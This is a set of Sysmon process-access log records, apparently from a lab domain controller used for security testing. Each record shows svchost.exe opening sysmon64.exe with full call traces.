{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1424,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1425,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1426,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1427,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1428,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
